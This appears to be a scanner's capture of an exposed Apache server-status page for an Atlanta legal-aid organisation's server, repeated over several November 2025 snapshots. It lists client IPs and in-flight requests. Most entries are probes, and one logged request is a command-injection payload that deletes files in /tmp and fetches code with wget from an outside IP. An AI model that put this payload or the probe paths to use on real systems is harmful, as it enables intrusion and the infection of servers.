::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.343168152620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0094056300.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00217172000.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00217171900.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00217171800.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00217171600.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00217171700.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00217171500.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82862339700.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00869479500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15859291500.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0686112156620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23861121500.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00869483000.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00869482800.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32861121510080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00869482900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00869482700.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00869482600.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00869482500.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00869482400.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00869482300.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001328716200.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001328716100.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001328716000.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001328715900.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001328715800.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001328715700.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001328715600.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001328715500.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001328715400.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001328715300.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02160d750c3
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 08-Nov-2025 07:54:48 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 579 Parent Server MPM Generation: 578 Server uptime: 577 days 15 hours 15 seconds Server load: 0.00 0.00 0.00 Total accesses: 13754768 - Total Traffic: 195.6 GB CPU Usage: u312.41 s27.27 cu0 cs0 - .000681% CPU load .276 requests/sec - 4207 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ___.W.______.................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-57830630/10/812094_ 2.4115705610.00.6813452.09 70.132.1.135http/1.1events.alas.org:8080GET /@vite/env HTTP/1.1 1-57830980/6/789040_ 0.88111900.00.2213060.50 204.76.203.18http/1.1atlantalegalaid.org:8080GET /bin/ HTTP/1.1 2-57830570/13/757450_ 4.1915825760.00.8112921.59 70.132.1.135http/1.1events.alas.org:8080POST /graphql/api HTTP/1.1 3-578-0/0/739622. 2.68188700.00.0012395.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-578306825/58/719996W 4.490027.91.9711875.18 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 5-578-0/0/699374. 2.31191400.00.0011552.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-57831110/22/660128_ 6.1615465970.01.8610885.47 70.132.1.135http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 7-57831160/76/635136_ 16.2315645030.04.8410384.74 70.132.1.135http/1.1events.alas.org:8080GET /v2/_catalog HTTP/1.1 8-57831210/33/603161_ 7.4715605030.02.569797.21 70.132.1.135http/1.1events.alas.org:8080GET /_all_dbs HTTP/1.1 9-57830730/6/583219_ 2.2374800.00.289205.60 204.76.203.18http/1.1atlantalegalaid.org:8080GET /backup/ HTTP/1.1 10-57834880/2/514107_ 0.7515815630.00.218744.92 70.132.1.135http/1.1events.alas.org:8080POST /api/gql HTTP/1.1 11-57834930/9/478465_ 3.9015715120.01.187893.25 70.132.1.135http/1.1events.alas.org:8080GET /v3/api-docs HTTP/1.1 12-577-0/0/414905. 8.6653862560.00.006592.90 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 13-577-0/0/328727. 0.46945400.00.004786.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-577-0/0/289451. 7.9853862570.00.004305.15 70.132.4.80http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 15-576-0/0/265212. 0.0014420400.00.003777.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-575-0/0/230461. 1.641781863240.00.003442.34 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-575-0/0/167581. 0.0022611300.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-575-0/0/145436. 0.0022611100.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-575-0/0/137595. 0.0022611000.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.0030008300.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.0030008000.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.0030007900.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.0030008100.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.342645862620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0088833400.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00211949100.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00211949000.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00211948900.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00211948700.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00211948800.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00211948600.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82857116800.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00864256600.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15854068600.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0685589866620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23855898600.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00864260100.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00864259900.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32855898610080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00864260000.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00864259800.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00864259700.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00864259600.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00864259500.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00864259400.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001323493300.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001323493200.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001323493100.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001323493000.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001323492900.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001323492800.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001323492700.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001323492600.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001323492500.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001323492400.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.00</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0216aefee91
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 07-Nov-2025 09:39:50 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 578 Parent Server MPM Generation: 577 Server uptime: 576 days 16 hours 45 minutes 17 seconds Server load: 0.00 0.00 0.00 Total accesses: 13753124 - Total Traffic: 195.5 GB CPU Usage: u305.65 s25.86 cu0 cs0 - .000665% CPU load .276 requests/sec - 4212 B/second - 14.9 kB/request 1 requests currently being processed, 8 idle workers W________....................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5772768525/37/811967W 1.630027.90.3713445.53 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 1-577278180/17/788928_ 2.6037600.00.7313056.32 64.62.156.157http/1.1atlantalegalaid.org:8080CONNECT www.shadowserver.org:443 HTTP/1.1 2-577275320/17/757302_ 2.8938100.00.5512915.08 64.62.156.155http/1.1atlantalegalaid.org:8080GET http://api.ipify.org/?format=json HTTP/1.1 3-577275370/63/739390_ 5.7343200.01.5612386.54 64.62.156.152http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-577279500/13/719833_ 1.9052600.00.4011867.75 176.65.149.19http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 5-577275310/16/699265_ 2.1084600.00.5611546.17 143.198.55.51http/1.1atlantalegalaid.org:8080GET /download/powershell/ HTTP/1.1 6-577275420/22/659928_ 5.6384600.00.6110877.07 143.198.55.51http/1.1atlantalegalaid.org:8080GET /get.php HTTP/1.1 7-577275470/42/634979_ 7.4135900.02.1310375.46 64.62.156.152http/1.1atlantalegalaid.org:8080GET /geoserver/web/ HTTP/1.1 8-577282040/2/603028_ 0.251903570.00.079790.48 3.172.46.107http/1.1atlantalegalaid.org:8080GET /v1/file/icon/seo/cdc3fff6-6034-46fb-8ef3-1746e374d4fc.png 9-576-0/0/583143. 7.69116896340.00.009201.26 70.132.4.80http/1.1events.atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 10-576-0/0/514087. 7.10116896410.00.008744.05 70.132.4.80http/1.1events.atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 11-576-0/0/478435. 0.002305000.00.007891.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-576-0/0/414858. 7.162305300.00.006590.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-576-0/0/328718. 10.542305200.00.004786.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-576-0/0/289370. 0.006411000.00.004302.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-576-0/0/265212. 0.006410600.00.003777.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-575-0/0/230461. 1.64980883240.00.003442.34 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-575-0/0/167581. 0.0014601500.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-575-0/0/145436. 0.0014601300.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-575-0/0/137595. 0.0014601200.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.0021998500.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.0021998300.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.0021998200.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.0021998400.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.341844882620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0080823600.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00203939300.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00203939200.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00203939100.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00203938900.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00203939000.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00203938800.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82849107000.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00856246800.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15846058900.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0684788886620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23847888800.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00856250300.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00856250100.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32847888810080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00856250200.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00856250000.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00856249900.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00856249800.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00856249700.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00856249600.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001315483500.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001315483400.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001315483300.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001315483200.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001315483100.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001315483000.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001315482900.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001315482800.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001315482700.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001315482600.00.00286.72 ::1http/1.1atlantalegalaid.org:8080O
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021e90fa87a
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 06-Nov-2025 11:32:08 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 577 Parent Server MPM Generation: 576 Server uptime: 575 days 18 hours 37 minutes 35 seconds Server load: 0.00 0.00 0.00 Total accesses: 13751594 - Total Traffic: 195.4 GB CPU Usage: u267.57 s23.15 cu0 cs0 - .000584% CPU load .276 requests/sec - 4218 B/second - 14.9 kB/request 1 requests currently being processed, 6 idle workers ______.......W.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-576204670/11/811855_ 1.18189200.00.2113442.23 42.233.105.12http/1.1atlantalegalaid.org:8080GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://42.233.105.12:5 1-576210900/13/788841_ 2.3223863890.00.5913052.72 130.176.187.246http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-576204330/13/757178_ 2.1023663690.00.5412909.49 130.176.187.246http/1.1atlantalegalaid.org:8080GET /?author=1 HTTP/1.1 3-576204380/14/739251_ 2.0226800.00.4612382.02 130.176.187.246http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 4-576204270/17/719767_ 3.9823861670.00.7311865.50 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762426334.863161087036132 5-576204280/22/699111_ 3.775100.00.9911542.81 70.132.1.135http/1.1short.alas.org:8080GET / HTTP/1.1 6-575-0/0/659775. 0.494157500.00.0010874.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-575-0/0/634815. 2.331842500.00.0010370.12 205.210.31.158http/1.1atlantalegalaid.org:8080\x16\x03\x01 8-575-0/0/602890. 0.981842500.00.009789.09 18.68.41.39http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 9-575-0/0/583062. 0.174170200.00.009199.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-575-0/0/514014. 0.094169600.00.008742.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-575-0/0/478416. 0.004170700.00.007890.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-575-0/0/414777. 0.004170600.00.006588.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-5762044324/39/328581W 2.410027.00.684783.95 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 14-575-0/0/289369. 0.004170500.00.004302.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-575-0/0/265211. 0.004170400.00.003777.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-575-0/0/230461. 1.64184253240.00.003442.34 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-575-0/0/167581. 0.006635300.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-575-0/0/145436. 0.006635100.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-575-0/0/137595. 0.006635000.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.0014032200.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.0014032000.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.0014031900.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.0014032100.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.341048262620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0072857400.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00195973100.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00195973000.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00195972900.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00195972700.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00195972800.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00195972600.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82841140800.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00848280600.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15838092600.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0683992266620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23839922600.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00848284100.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00848283900.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32839922610080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00848284000.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00848283800.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00848283700.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00848283600.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00848283500.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00848283400.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001307517200.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001307517100.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001307517000.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001307516900.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001307516800.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001307516700.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001307516600.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001307516500.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001307516400.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001307516300.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/2733
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021add4eaac
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 05-Nov-2025 16:47:41 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 576 Parent Server MPM Generation: 575 Server uptime: 574 days 23 hours 53 minutes 8 seconds Server load: 0.00 0.00 0.00 Total accesses: 13750672 - Total Traffic: 195.4 GB CPU Usage: u320.63 s28.24 cu0 cs0 - .000702% CPU load .277 requests/sec - 4223 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers W_________...................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU 